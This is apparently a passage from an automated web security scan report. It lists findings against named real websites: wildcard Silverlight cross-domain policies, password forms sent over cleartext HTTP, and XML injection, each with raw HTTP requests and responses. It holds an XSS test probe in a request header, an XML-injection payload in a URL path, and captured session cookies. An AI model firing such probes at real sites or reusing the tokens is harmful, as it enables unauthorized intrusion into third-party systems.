Date: Sun, 01 May 2011 23:34:41 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...
9.3. http://metrics.washingtonpost.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.washingtonpost.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.washingtonpost.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:34:47 GMT
Server: Omniture DC/2.0.0
xserver: www53
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
9.4. http://n4403ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://n4403ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: n4403ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Mon, 02 May 2011 01:58:40 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
9.5. http://s0.2mdn.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 01 May 2011 06:39:14 GMT
Expires: Mon, 02 May 2011 06:39:14 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 60917

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
9.6. http://view.atdmt.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: view.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Fri, 28 Mar 2008 17:48:18 GMT
Accept-Ranges: bytes
ETag: "9e243e8fb90c81:0"
Date: Mon, 02 May 2011 02:20:10 GMT
Connection: close
Content-Length: 312

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
10. Cleartext submission of password  previous  next
There are 10 instances of this issue:

10.1. http://insurancenewsnet.com/article.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://insurancenewsnet.com
Path:   /article.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /article.aspx?id=257992 HTTP/1.1
Host: insurancenewsnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=600
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=1k3l4a55gy1fk4jf5xabtr45; path=/; HttpOnly
Set-Cookie: INNid=1k3l4a55gy1fk4jf5xabtr45; expires=Tue, 01-May-2012 23:33:25 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:33:25 GMT
Content-Length: 74743


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Insur
...[SNIP]...
<!-- end Tooltips -->
<form name="aspnetForm" method="post" action="article.aspx?id=257992" id="aspnetForm">
<div>
...[SNIP]...
<p style="padding:0px 5px; margin-bottom:0;">Password: <input name="ctl00$Template_navigation$txtLoginPassword" type="password" id="ctl00_Template_navigation_txtLoginPassword" onkeydown="if(event.which || event.keyCode){if ((event.which == 13) || (event.keyCode == 13)) {__doPostBack('ctl00$Template_navigation$btnLoginUser', '');return false;}} else {return true}; " style="width:115px;" /></p>
...[SNIP]...
10.2. http://www.greenhulk.net/forums/login.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

POST /forums/login.php?do=login HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/register.php
Cache-Control: max-age=0
Origin: http://www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gh_lastactivity=0; __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.2.10.1304319910
Content-Length: 222

vb_login_username=User+Name&vb_login_password_hint=Password&vb_login_password=&s=&securitytoken=guest&do=login&vb_login_md5password=d41d8cd98f00b204e9800998ecf8427e&vb_login_md5password_utf=d41d8cd98f
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:30:42 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:30:42 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...
</script>
           <form id="navbar_loginform" action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
               <fieldset id="logindetails" class="logindetails">
...[SNIP]...
<input type="text" class="textbox default-value" tabindex="102" name="vb_login_password_hint" id="navbar_password_hint" size="10" value="Password" style="display:none;" />
                   <input type="password" class="textbox" tabindex="102" name="vb_login_password" id="navbar_password" size="10" />
                   <input type="submit" class="loginbutton" tabindex="104" value="Log in" title="Enter your username and password in the boxes provided to login, or click the 'register' button to create a profile
...[SNIP]...
10.3. http://www.greenhulk.net/forums/login.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

POST /forums/login.php?do=login HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/register.php
Cache-Control: max-age=0
Origin: http://www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gh_lastactivity=0; __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.2.10.1304319910
Content-Length: 222

vb_login_username=User+Name&vb_login_password_hint=Password&vb_login_password=&s=&securitytoken=guest&do=login&vb_login_md5password=d41d8cd98f00b204e9800998ecf8427e&vb_login_md5password_utf=d41d8cd98f
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:30:42 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:30:42 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...
</h2>
   
       <form class="block vbform" method="post" action="login.php?do=login" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">    
           <input type="hidden" name="do" value="login" />
...[SNIP]...
</label>
                       <input type="password" class="primary textbox" id="vb_login_password" name="vb_login_password" tabindex="1" />
                   </div>
...[SNIP]...
10.4. http://www.greenhulk.net/forums/register.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/register.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /forums/register.php HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/showthread.php?126285-Rear-boarding-step
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.1.10.1304319910

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:28:52 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:28:52 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:28:52 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:28:52 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <me
...[SNIP]...
</script>

<form id="registerform" action="register.php?do=addmember" name="register" method="post" onsubmit="return verify_passwords(password, passwordconfirm);" class="vbform block">

   
   <h2 class="blockhead">
...[SNIP]...
</label>
                       <input type="password" class="textbox" name="password" id="password" maxlength="50" value="" tabindex="1" />
                   </li>
...[SNIP]...
</label>
                       <input type="password" class="textbox" name="passwordconfirm" id="passwordconfirm" maxlength="50" value="" tabindex="1" />
                   </li>
...[SNIP]...
10.5. http://www.greenhulk.net/forums/register.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/register.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /forums/register.php HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/showthread.php?126285-Rear-boarding-step
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.1.10.1304319910

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:28:52 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:28:52 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:28:52 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:28:52 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <me
...[SNIP]...
</script>
           <form id="navbar_loginform" action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
               <fieldset id="logindetails" class="logindetails">
...[SNIP]...
<input type="text" class="textbox default-value" tabindex="102" name="vb_login_password_hint" id="navbar_password_hint" size="10" value="Password" style="display:none;" />
                   <input type="password" class="textbox" tabindex="102" name="vb_login_password" id="navbar_password" size="10" />
                   <input type="submit" class="loginbutton" tabindex="104" value="Log in" title="Enter your username and password in the boxes provided to login, or click the 'register' button to create a profile
...[SNIP]...
10.6. http://www.greenhulk.net/forums/showthread.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/showthread.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /forums/showthread.php?126285-Rear-boarding-step HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:10:50 GMT
Server: Apache
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:10:50 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:10:50 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 73170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...
</script>
           <form id="navbar_loginform" action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
               <fieldset id="logindetails" class="logindetails">
...[SNIP]...
<input type="text" class="textbox default-value" tabindex="102" name="vb_login_password_hint" id="navbar_password_hint" size="10" value="Password" style="display:none;" />
                   <input type="password" class="textbox" tabindex="102" name="vb_login_password" id="navbar_password" size="10" />
                   <input type="submit" class="loginbutton" tabindex="104" value="Log in" title="Enter your username and password in the boxes provided to login, or click the 'register' button to create a profile
...[SNIP]...
10.7. http://www.hotwheelscollectors.com/HWCErrorPage.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotwheelscollectors.com
Path:   /HWCErrorPage.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /HWCErrorPage.aspx?errID=404 HTTP/1.1
Host: www.hotwheelscollectors.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=nt3qwb55gans5433wc3ilm55

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:33:20 GMT
Server: MII-WSD/1.4
Cache-Control: no-cache=,no-store=
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: NSC_Dpmmfdupst_Ipuxiffmt=440af0e93660;expires=Mon, 02-May-11 03:03:50 GMT;path=/
Cache-Control: max-age=0
Via: HTTP/1.1 www.hotwheelscollectors.com (MII-WSD/1.4)
x-Message1: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Content-Length: 30101
Via: 1.1 mdw107102 (MII-APC/1.6)


    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   

<html>

<head>

<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<meta http-equiv="content-language"
...[SNIP]...
<!-- UC: Mini Signin -->
<form method="post" id="Form1" action="/UMS/Login.aspx" onkeydown="if(event.which || event.keyCode){if ((event.which == 13) || (event.keyCode == 13)){document.getElementById('MiniSignIn_btnSubmit').click();return false;}} else {return true};">

<input type="hidden" id="formSource" name="formSource" value="MiniSignIn" />
...[SNIP]...
<div class="float-left"><input type="password" name="txtPassword" id="txtPassword" maxlength="40" tabindex="1002" class="minifield" /></div>
...[SNIP]...
10.8. http://www.japanator.com/elephant/login.phtml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /elephant/login.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.1.10.1304319358; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:55:17 GMT
Server: lighttpd/1.4.28
Content-Length: 47739


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login | Japan
...[SNIP]...
<td width=648 valign=top bgcolor=white>


<form action="http://www.japanator.com/elephant/login.phtml" method="post">

<input type="hidden" name="back_to" value="">
...[SNIP]...
<br/>
   <input type="password" name="password">
</p>
...[SNIP]...
10.9. http://www.japanator.com/elephant/signup.phtml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/signup.phtml

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /elephant/signup.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.3.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:06:57 GMT
Server: lighttpd/1.4.28
Content-Length: 46289


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Signup for an
...[SNIP]...
<td width=648 valign=top bgcolor=white>


<form action="signup.phtml" method="post">

<input type="hidden" name="back_to" value="http://www.japanator.com/elephant/">
...[SNIP]...
<td><input type="password" name="password" value="">
<br>
...[SNIP]...
<td ><input type="password" name="password2" value="">
<br>
...[SNIP]...
10.10. http://www.mrsdash.com/favicon.ico  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mrsdash.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrsdash.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:08:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=af4qxtezlapjev55htmjv345; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 66911


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Pag
...[SNIP]...
<body id="sitemap">
   <form name="frmMain" method="post" action="/404iis.aspx?404;http://www.mrsdash.com:80/favicon.ico" id="frmMain">
<div>
...[SNIP]...
</label>
                       <input name="cTopNav$txtPassword" type="password" maxlength="25" id="cTopNav_txtPassword" onkeydown="setEnterKey('.newMemRegistra', event);" />

                       <label>
...[SNIP]...
</label>
                       <input name="cTopNav$txtConfirmPassword" type="password" maxlength="25" id="cTopNav_txtConfirmPassword" onkeydown="setEnterKey('.newMemRegistra', event);" />

                       
                       <div class="newsletter">
...[SNIP]...
</label>
                       <input name="cTopNav$txtPassword_logn" type="password" maxlength="25" id="cTopNav_txtPassword_logn" onkeydown="setEnterKey('.signinMem', event);" />

                       <p class="more">
...[SNIP]...
11. XML injection  previous  next
There are 16 instances of this issue:

11.1. http://loadm.exelator.com/load/ [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://loadm.exelator.com
Path:   /load/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /load]]>>/?p=204&g=001&bi=CAESENh7sluIi3Lo5TRo_oosBvM&cver=1&j=0 HTTP/1.1
Host: loadm.exelator.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
